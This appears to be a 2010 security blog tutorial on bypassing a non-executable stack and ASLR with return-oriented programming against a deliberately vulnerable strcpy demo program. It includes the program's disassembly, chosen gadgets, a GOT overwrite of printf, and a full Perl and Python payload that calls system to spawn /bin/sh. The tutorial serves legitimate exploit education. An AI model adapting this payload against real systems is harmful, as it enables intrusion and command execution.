Tuesday, May 4, 2010

Advanced Return-Oriented Exploit

This is a brief introduction to a cool little technique for buffer overflow exploits under the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, neither a plain return-to-stack nor a plain return-to-libc attack works.

The vulnerable program I am going to use is a modified version of gera's program in [1]. There is no stack canary protection, but I make exploitation much harder by modifying the code a little: func calls exit instead of returning, and stack and libc addresses are randomized (ASLR). The modified version is shown below:

#include <ctype.h>   /* toupper */
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

int func(char *msg) {
    char buf[80];
    strcpy(buf,msg);
    buf[0] = toupper(buf[0]);
    strcpy(msg,buf);
    printf("Caps: %s\n",msg);
    exit(1);
}

int main(int argc, char** argv) {
    func(argv[1]);
}

1. Vulnerability

There is a classic strcpy vulnerability in func. The two consecutive strcpy calls let us write arbitrary values to an arbitrary address: the first strcpy overflows buf and overwrites the msg pointer, and the second strcpy then copies our data to wherever msg now points. Note that overwriting the return address of func is not enough, because func calls exit and never returns. This is clearer in the disassembly of the program:

080484b4 <func>:
 80484b4:       55                      push   %ebp
 80484b5:       89 e5                   mov    %esp,%ebp
 80484b7:       83 ec 58                sub    $0x58,%esp
 80484ba:       8b 45 08                mov    0x8(%ebp),%eax
 80484bd:       89 44 24 04             mov    %eax,0x4(%esp)
 80484c1:       8d 45 b0                lea    -0x50(%ebp),%eax
 80484c4:       89 04 24                mov    %eax,(%esp)
 80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
 80484cc:       0f b6 45 b0             movzbl -0x50(%ebp),%eax
 80484d0:       0f be c0                movsbl %al,%eax
 80484d3:       89 04 24                mov    %eax,(%esp)
 80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
 80484db:       88 45 b0                mov    %al,-0x50(%ebp)
 80484de:       8d 45 b0                lea    -0x50(%ebp),%eax
 80484e1:       89 44 24 04             mov    %eax,0x4(%esp)
 80484e5:       8b 45 08                mov    0x8(%ebp),%eax
 80484e8:       89 04 24                mov    %eax,(%esp)
 80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
 80484f0:       8b 45 08                mov    0x8(%ebp),%eax
 80484f3:       89 44 24 04             mov    %eax,0x4(%esp)
 80484f7:       c7 04 24 00 86 04 08    movl   $0x8048600,(%esp)
 80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
 8048503:       c7 04 24 01 00 00 00    movl   $0x1,(%esp)
 804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
0804850f <main>:
 804850f:       8d 4c 24 04             lea    0x4(%esp),%ecx
 8048513:       83 e4 f0                and    $0xfffffff0,%esp
 8048516:       ff 71 fc                pushl  -0x4(%ecx)
 8048519:       55                      push   %ebp
 804851a:       89 e5                   mov    %esp,%ebp
 804851c:       51                      push   %ecx
 804851d:       83 ec 14                sub    $0x14,%esp
 8048520:       8b 41 04                mov    0x4(%ecx),%eax
 8048523:       83 c0 04                add    $0x4,%eax
 8048526:       8b 00                   mov    (%eax),%eax
 8048528:       89 04 24                mov    %eax,(%esp)
 804852b:       e8 84 ff ff ff          call   80484b4 <func>
 8048530:       83 c4 14                add    $0x14,%esp
 8048533:       59                      pop    %ecx
 8048534:       5d                      pop    %ebp
 8048535:       8d 61 fc                lea    -0x4(%ecx),%esp
 8048538:       c3                      ret
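
The disassembly also pins down how many bytes the first strcpy has to write before it reaches the msg pointer. The following is only a small arithmetic sketch on the two frame offsets visible in func (-0x50(%ebp) for buf and 0x8(%ebp) for msg); the variable names are mine, not part of the original program.

```python
# Offsets relative to %ebp, read off the disassembly of func.
BUF_OFFSET = -0x50   # lea -0x50(%ebp),%eax  -> start of buf
MSG_OFFSET = 0x8     # mov 0x8(%ebp),%eax    -> the msg argument

# Everything between the start of buf and msg:
# 80 bytes of buf + 4 bytes of saved ebp + 4 bytes of return address.
bytes_before_msg = MSG_OFFSET - BUF_OFFSET

print(bytes_before_msg)  # 88
```

So bytes 88 to 91 of the input replace msg, which is the destination of the second strcpy.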


2. Observation and Strategy


The second strcpy lets us write to an arbitrary memory location, but the target should not be the return address of func, because func calls exit and never returns. There are several possible targets, including .dtors and the GOT. In this example, I am going to overwrite the GOT entry of the printf function. The GOT lives in a writable data section of the program, and in this binary its address is not randomized.

Now we can hijack the control flow when printf is called, so the next step is to decide where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute forcing here). However, we know that the code section's addresses are fixed, so we are going to use the return-oriented programming technique introduced by Hovav Shacham [2]. In this problem, we can only use the code section of this small program. Therefore, only a few gadgets are available.

The return-oriented program that we are going to design works as follows: (1) retrieve the address of libc's strcpy function from the GOT, (2) compute the relative offset from the strcpy function to the system function, (3) obtain the address of the system function from steps 1 and 2, (4) set up the stack to hold a pointer to the "/bin/sh" string, (5) jump to the system function using an indirect call (call *%eax).
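
Steps (1) to (3) work because ASLR moves libc as a whole, so the distance between two libc functions stays the same on every run. Here is a minimal sketch of that arithmetic; the libc offsets and load bases are hypothetical values chosen for illustration, and the helper names are mine.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide on this target


def add32(a, b):
    """Wrapping 32-bit addition, matching the x86 add instruction."""
    return (a + b) & MASK32


def resolve_system(strcpy_runtime, system_minus_strcpy):
    """Steps (2)-(3): add the fixed libc-internal distance to the leaked pointer."""
    return add32(strcpy_runtime, system_minus_strcpy)


# Hypothetical offsets of the two functions inside some libc build.
STRCPY_OFFSET = 0x00075000
SYSTEM_OFFSET = 0x0003A000
DISTANCE = (SYSTEM_OFFSET - STRCPY_OFFSET) & MASK32  # negative, so it wraps

# Two hypothetical randomized load bases: the same distance works for both.
for libc_base in (0xB7E00000, 0xB7D4C000):
    strcpy_runtime = add32(libc_base, STRCPY_OFFSET)  # what the GOT entry holds
    assert resolve_system(strcpy_runtime, DISTANCE) == add32(libc_base, SYSTEM_OFFSET)
```

The real distance depends on the exact libc binary on the target, so it has to be measured there.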

(Note) Since we are using the "system" function, we cannot actually do "setuid" for this exploit. Calling an "exec" function in libc is trickier, and I will not cover it in this article.

3. Gadgets


We are going to use the following four gadgets, all found in the code section, to perform the exploitation.

(1)
0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
0x80485a5 <__libc_csu_init+85>: pop    %ebx
0x80485a6 <__libc_csu_init+86>: pop    %esi
0x80485a7 <__libc_csu_init+87>: pop    %edi
0x80485a8 <__libc_csu_init+88>: pop    %ebp
0x80485a9 <__libc_csu_init+89>: ret

(2)
0x804838c <_init+44>:   pop    %eax
0x804838d <_init+45>:   pop    %ebx
0x804838e <_init+46>:   leave
0x804838f <_init+47>:   ret

(3)
0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
0x80485d4 <__do_global_ctors_aux+36>:   add    $0x4,%esp
0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
0x80485d9 <__do_global_ctors_aux+41>:   ret

(4)
0x80484af <frame_dummy+31>:     call   *%eax

4. Final Exploit


Using the above four gadgets, I introduce the following exploit. Notice that this is not just a simple return-oriented programming exploit; several techniques are involved:
(1) Dynamically retrieving the system function's address from the GOT.
(2) Changing the ebp register to point to the bss section so that we can control the esp and ebp continuously.
(3) Setting up the stack address so that there is enough space for the call to system.

First, the second gadget sets up the eax and ebx values that the third gadget uses to compute the system function's address. The result of the "add 0xf475fff8(%ebx), %eax" instruction must be the address of the system function in libc. Specifically, 0xf475fff8(%ebx) must point to strcpy's GOT entry, so that strcpy's address in libc is added to the value in the eax register.
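
To make the constraint on ebx and eax concrete, the sketch below plugs in the two constants that appear in the exploit string in this section. It only performs 32-bit arithmetic. The resulting GOT address is what that arithmetic yields rather than a value stated elsewhere in this post, and the eax constant is specific to the libc I tested against.

```python
MASK32 = 0xFFFFFFFF

DISPLACEMENT = 0xF475FFF8      # from: add 0xf475fff8(%ebx),%eax
EBX_FROM_PAYLOAD = 0x138EA014  # "\x14\xa0\x8e\x13" in the exploit string
EAX_FROM_PAYLOAD = 0xFFFC52C0  # "\xc0\x52\xfc\xff" in the exploit string

# Address the third gadget reads from: ebx + displacement, wrapped to 32 bits.
effective_address = (EBX_FROM_PAYLOAD + DISPLACEMENT) & MASK32
print(hex(effective_address))  # 0x804a00c

# eax read as a signed 32-bit number: the distance from strcpy to system.
signed_distance = EAX_FROM_PAYLOAD - (1 << 32)
print(hex(signed_distance))  # -0x3ad40
```

The effective address sits 4 bytes below printf's GOT entry at 0x0804a010, which fits strcpy being the PLT entry just before printf. Choosing ebx this way also keeps null bytes out of the string, which matters because strcpy stops at the first one.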

Changing the ebp register in the first gadget is the trickiest part. In the first gadget, we set ebp to point into a writable region at the bss section (more precisely, beyond the bss section). Because 0x804a2e8 lies in a writable region, we can use it as the new value for ebp and esp. In the second gadget, the leave instruction copies ebp into esp. Thus, after the second gadget, both ebp and esp point to addresses in the bss section.

The final exploit in Perl is shown below:
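
The pivot address is not arbitrary: it has to land on data that the second strcpy has just copied. The sketch below checks this with plain arithmetic, assuming the layout of the exploit string in this section (88 bytes up to the msg pointer, the 4-byte pointer itself, then 0xa0 filler words). The names are mine.

```python
PRINTF_GOT = 0x0804A010  # destination of the second strcpy
PIVOT_EBP = 0x0804A2E8   # value the first gadget pops into ebp

# Where the pivot lands, measured from the start of the copied string.
pivot_offset = PIVOT_EBP - PRINTF_GOT
print(pivot_offset)  # 728

# Layout of the string: 88 bytes, the overwritten msg pointer, 0xa0 filler words.
PREFIX_LEN = 88 + 4
FILLER_WORDS = 0xA0
last_filler_offset = PREFIX_LEN + (FILLER_WORDS - 1) * 4
next_word_offset = PREFIX_LEN + FILLER_WORDS * 4

# leave = mov %ebp,%esp ; pop %ebp, so the word at the pivot becomes the new
# ebp and the word right after it is the address that ret jumps to.
assert pivot_offset == last_filler_offset
print(next_word_offset)  # 732
```

So leave pops the last filler word into ebp, and the following ret takes the word at offset 732, which is where the exploit places the third gadget.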

print "\xa2\x85\x04\x08" . # first gadget
      "AAAAAAAA" . # dummy
      "\xe8\xa2\x04\x08" . # set ebp
      "\x8c\x83\x04\x08" . # second gadget
      "\xc0\x52\xfc\xff" . # eax: offset from strcpy to system
      "\x14\xa0\x8e\x13AAAA" . # ebx for the third gadget, then filler
      "/bin/sh;"  . # command string for system
      "A"x48 . # padding up to the msg pointer
      "\x10\xa0\x04\x08" . # GOT entry address of printf
      "\x30\xa0\x04\x08"x0xa0 . # dummy
      "\xce\x85\x04\x08" . # third gadget
      "\x30\xa0\x04\x08"x0x2 . # dummy
      "\x30\xa0\x04\x08" . # dummy ebp
      "\xaf\x84\x04\x08" . # call *%eax
      "\x30\xa0\x04\x08"; # argument to system: pointer to "/bin/sh;"
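
For readers who prefer to check the layout programmatically, here is a sketch of the same string built in Python. It is a transcription of the Perl above, not a different exploit. The constant and function names are mine, and every address is specific to the binary and libc used in this post.

```python
import struct


def p32(value):
    """Pack a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value)


GADGET1 = 0x080485A2     # add $0xc,%esp ; pop x4 ; ret
GADGET2 = 0x0804838C     # pop %eax ; pop %ebx ; leave ; ret
GADGET3 = 0x080485CE     # add 0xf475fff8(%ebx),%eax ; ... ; ret
CALL_EAX = 0x080484AF    # call *%eax
PRINTF_GOT = 0x0804A010  # overwritten msg pointer / copy destination
PIVOT_EBP = 0x0804A2E8   # new frame in the writable region
CMD_PTR = 0x0804A030     # where "/bin/sh;" ends up after the copy


def build_payload():
    payload = p32(GADGET1)                    # lands in printf's GOT entry
    payload += b"A" * 8                       # dummy
    payload += p32(PIVOT_EBP)                 # set ebp
    payload += p32(GADGET2)
    payload += p32(0xFFFC52C0)                # eax: offset from strcpy to system
    payload += p32(0x138EA014) + b"AAAA"      # ebx, then filler
    payload += b"/bin/sh;"                    # command string
    payload += b"A" * 48                      # padding up to msg
    payload += p32(PRINTF_GOT)                # new value of msg
    payload += p32(CMD_PTR) * 0xA0            # dummy
    payload += p32(GADGET3)
    payload += p32(CMD_PTR) * 2               # dummy
    payload += p32(CMD_PTR)                   # dummy ebp
    payload += p32(CALL_EAX)
    payload += p32(CMD_PTR)                   # argument to system
    return payload


payload = build_payload()
print(len(payload))  # 756
```

Two properties are worth checking on the result: the string contains no null byte (strcpy would stop there), and "/bin/sh;" sits at offset 32, so after the copy to 0x0804a010 it is located at 0x0804a030. To feed the bytes to the target, something like sys.stdout.buffer.write(build_payload()) can stand in for the Perl print.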

5. Conclusion


There are many possible ways of bypassing ASLR protections. Here, I presented one way to apply the return-oriented programming technique in a very limited environment: small code space, randomized stack, and randomized libc.

About

Hi, I am a PhD candidate at CMU. I was one of the founding members of PPP (Plaid Parliament of Pwning). I like programming in OCaml, F#, Haskell, and C++.